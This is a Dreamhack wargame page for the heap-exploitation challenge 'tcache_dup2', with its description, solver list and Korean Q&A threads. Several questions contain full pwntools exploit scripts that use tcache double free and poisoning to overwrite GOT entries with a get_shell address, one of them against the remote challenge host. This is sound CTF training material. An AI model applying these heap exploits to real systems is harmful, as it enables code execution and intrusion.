LEVEL 2

tcache_dup2

pwnable
1488
734
로그인 하고 문제 풀기
  • 문제 정보
  • 풀이 66
  • 난이도 투표 45
  • 질문 14
  • 최근 풀이자 734
  • 댓글 38

문제 설명

Description

이 문제는 서버에서 작동하고 있는 서비스(tcache_dup2)의 바이너리와 소스 코드가 주어집니다.
취약점을 익스플로잇해 셸을 획득한 후, "flag" 파일을 읽으세요.
"flag" 파일의 내용을 워게임 사이트에 인증하면 점수를 획득할 수 있습니다.
플래그의 형식은 DH{...} 입니다.

Environment
Ubuntu 19.10
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
Reference

Heap Allocator2

Chall Updates

2023.04.28: Dockerfile이 제공됩니다.

출제자 정보

avatar
Dreamhack
대표 업적 없음
2020.06.19. 16:32:27

First Blood!

avatar
호빵맨
워게임: 50
출제된 지 2시간 만에 풀이 완료!

난이도 투표 45

질문 14

문제 풀이에 어려움이 있으신가요?
커뮤니티에서 문제에 대한 질문하고 답변 얻기
printf, read?
문제는 해결했습니다. 하지만 got overwrite을 해줄때 처음에 printf나 read의 got를 overwrite해주려고 해보았는데 안되고 다른 함수의 got를 overwrite해서서 해결하게 되었습니다. 근데 printf,read의 got를 overwrite했을 땐 왜 안되는지 잘 모르겠는데 그 이유에 대해서 고수분들께서 도와주셨으면 합니다. ㅎㅎㅎ
avatar FisMA
답변 3
추천 13
4년 전
modify_heap??
Double free를 쓰지 않고 청크를 1번만 Free한 다음에 Modify_heap으로 next 포인터를 got 주소로 변경후 익스플로잇을 시도해봤습니다. 그런데 우분투 18.04 버전에서는 익스플로잇이 성공적으로 됐지만 우분투 20.04 버전이랑 리모트에서는 tcachebins 에 got 주소가 들어가긴 했지만 막상 malloc을 하면 tcachebins에 들어간 got 주소가 아니라 heap에 할당이 됩니다. 어떤 이유로 이런 결과가 나오는지 알려주신다면 감사하겠습니다 ㅠㅠ
d05004
답변 2
추천 5
3년 전
tcache_dup_key값??
modify_heap()부분에서 힙의 Data에 채워주는 dummy값의 수를 줄여주면 익스플로잇이 안되는데 왜 그런건가요?? 예를 들어서 ''' Modify(1,10,"A"*10) ''' 이렇게 진행했는데 "A"*10일 때는 익스플로잇이 성공적으로 진행됐지만 "A"의 수가 9개 이하일 떄는 익스플로잇이 진행되지 않습니다. 이유 아시는 고수분 답변 남겨주십쇼 아마 key값과 상관있을것 같은데 정확한 이유 아시는분 있나요?? 제가 참고한 블로그는 https://blog.naver.com/apple8718/memo/222251479607 입니다.
avatar sangjun
답변 1
추천 5
4년 전
printf got를 overwrite 했을 경우에 shell을 획득하지 못하는 이유를 알고 싶습니다.
tcache의 chunk list를 활용해서 got overwrite를 하는데 puts_got의 경우 shell을 획득할 수 있지만 printf_got의 경우 shell을 획득하지 못했습니다. #free(0), free(1) tcache: chunk B -> chunk A #Modify_heap(1, 0x10, p64(e.got['puts'])) tcache: chunk A -> puts_got #Create_heap(0x10, b'A') tcache: puts_got #Create_heap(0x10, p64(e.sym['get_shell']) 위와 같은 과정을 통해 puts_got를 overwrite한 경우 shell을 획득할 수 있었지만 printf_got를 활용한 경우 shell을 획득할 수 없는 이유를 알고 싶습니다.
Dreamer
답변 1
추천 1
8개월 전
tc_idx??????
tc_idx가 낮은 값을 갖지 않게 하는 이유가 이후 할당할 때 tcache_entry를 참조하여 할당할 수 있게끔 하기 위해라고 했는데 이게 무슨 말인지 잘 모르겠습니다. ㅠ
avatar d3lphia
답변 1
추천 1
2년 전
tc_idx 질문
안녕하세요. 이번 문제를 풀면서 tc_idx와 관련하여 궁금증이 생겨서 이렇게 질문을 남깁니다. tcache_dup와 Tcache Poisoning 워게임을 풀 때는 tc_idx를 신경써주지 않았는데, 해당 문제에서만 tc_idx를 신경써줘야 하는 이유가 Ubuntu 버전 차이인가요 ? 아니면 glibc 차이인가요 ? tc_idx를 쓰지 않는 문제는 도커 파일이 Ubuntu 18.04 libc-2.27.so이고, 이번 문제는 Ubuntu 19.10, libc-2.30.so 입니다. 그리고 tc_idx가 0일 때, malloc을 하면 어디서 청크를 할당받나요 ?
ro
답변 1
추천 0
3개월 전
fd 값 질문
from pwn import * p = process("./tcache_dup2") e = ELF("./tcache_dup2") def create_heap(size,data): p.sendlineafter("> ",'1') p.sendlineafter("Size: ",str(size)) p.sendafter("Data: ",data) def modify_heap(idx,size,data): p.sendlineafter("> ",'2') p.sendlineafter("idx: ",str(idx)) p.sendlineafter("Size: ",str(size)) p.sendafter("Data: ",data) def delete_heap(idx): p.sendlineafter("> ",'3') p.sendlineafter("idx: ",str(idx)) get_shell = 0x401530 free = e.got['free'] create_heap(0x30,"aaaa") create_heap(0x30,"bbbb") delete_heap(0) delete_heap(1) modify_heap(1,0xa,b"A"*8+b"\x00") delete_heap(1) create_heap(0x30,p64(free)) create_heap(0x30,b"B"*8) create_heap(0x30,p64(get_shell)) delete_heap(1) p.interactive() tc_idx값을 3으로 만들기 위해 두번 동일한 크기의 chunk를 할당하고 free한후 하나의 chunk는 double free를 발생시켜 fd에 free_got 주소를 입력했습니다. 그리고 저는 다음번 할당때 double free에 사용했던 chunk가 할당되고 그다음에 fd값에 입력했던 free_got 주소로 할당될 거라고 생각했었는데 create_heap(0x30,p64(get_shell)) 이 부분에서 unaligned tcache chunk detected 라는 문구와 함께 종료되었는데 어떤 부분에서 잘못됐는지 잘 모르겠습니다ㅠ
avatar Soon
답변 1
추천 0
2년 전
tcache 인덱스가 3이여야하는 이유가 있을까요?
exploit 코드에서 할당을 두번해서 인덱스 값을 3으로 만드는 이유가 궁금합니다!
asdfasdfasdfasdfasdfasdf
답변 1
추천 0
10개월 전
chunk 할당을 2번 해야하는 이유
문제를 풀다가 궁금한 점이 있어서 질문 남깁니다. 제가 처음에 작성했던 exploit 코드는 아래와 같습니다. from pwn import * #context.log_level = 'debug' p = remote("host3.dreamhack.games", 22465) e = ELF("./tcache_dup2") def create(size, data): p.sendlineafter(">", str(1)) p.sendlineafter("Size: ", str(size)) p.sendafter("Data: ", data) def modify(idx, size, data): p.sendlineafter(">", str(2)) p.sendlineafter("idx: ", str(idx)) p.sendlineafter("Size: ", str(size)) p.sendafter("Data: ", data) def delete(idx): p.sendlineafter(">", str(3)) p.sendlineafter("idx: ", str(idx)) create(48, b"a"*0x8) delete(0) modify(0, 9, b"\x00"*0x8 + b"\xaa") delete(0) puts_got = e.got['puts'] get_shell = e.symbols['get_shell'] create(48, p64(puts_got)) create(48, b"a"*0x8) create(48, p64(get_shell)) p.interactive() 그런데 이렇게 해도 안풀려서 혹시나 하는 마음에 chunk를 2개 할당한 뒤 뒤에 할당한 chunk를 DFB로 해보았더니 exploit이 되더군요...코드는 아래와 같습니다. create(48, b"a"*0x8) create(48, b"b"*0x8) delete(0) delete(1) modify(1, 9, b"\x00"*0x8 + b"\xaa") delete(1) puts_got = e.got['puts'] get_shell = e.symbols['get_shell'] create(48, p64(puts_got)) create(48, b"a"*0x8) create(48, p64(get_shell)) p.interactive() 이렇게 chunk를 2개 할당해야 하는 이유가 무엇인지 알고싶습니다.
avatar green_monster
답변 1
추천 0
5개월 전
modify 후 free에 있던 청크들이 할당됨
`create(0x40, b'AAAA') create(0x40, b'BBBB') create(0x40, b'CCCC') delete(0) delete(1) delete(2) modify(2, 0xa, b'B'*8 + b'\x00')` 위 코드에서 delete(2)를 실행 한 후 heap을 보면 3개가 free되어있는데, modify를 실행한 후 heap을 보게되면 `Allocated chunk | PREV_INUSE Addr: 0x21fb250 Size: 0x51 Allocated chunk | PREV_INUSE Addr: 0x21fb2a0 Size: 0x51 Free chunk (tcachebins) | PREV_INUSE Addr: 0x21fb2f0 Size: 0x51 fd: 0x4242424242424242` 위와 같이 두개가 할당되어 있습니다. 이유가 뭔가요??
han76
답변 1
추천 0
7개월 전

최근 풀이자 734

avatar
tr4ce
새싹
3시간 전
avatar
vani5hing
대표 업적 없음
14시간 전
avatar
m1zuguchi
대표 업적 없음
5일 전
서경대김재중
대표 업적 없음
6일 전
sealhorse
대표 업적 없음
7일 전
01sch
대표 업적 없음
7일 전
avatar
헤브어
대표 업적 없음
7일 전
avatar
Flopa
대표 업적 없음
7일 전
삽질중
대표 업적 없음
8일 전
나이테
대표 업적 없음
10일 전

댓글 38

Nein
대표 업적 없음
2개월 전
ㅜ.ㅜ
avatar
사용자
해결사
1년 전
좋은 문제입니다~
avatar
is07king
워게임: 1
1년 전
નુલુંગ 어려워
avatar
Rosieblue
워게임 고인물
1년 전
count때문에 삽질했네요... 꼭 유의하기 ㅜ
avatar
Newb1e
워게임 풀이: 1
2년 전
강의대로 가지 않고(Double Free를 일으키지 않고) 문제를 풀 수도 있습니다.
avatar
Sunja
강의 수강: 10
2년 전
heap 을 자세히 알게 된 문제..
avatar
Neutrinox4b1
워게임: 50
2년 전
귯귯
avatar
msh1307
대표 업적 없음
2년 전
: )
0I0Hackyy
강의 수강: 1
2년 전
good!!
anous
대표 업적 없음
3년 전
good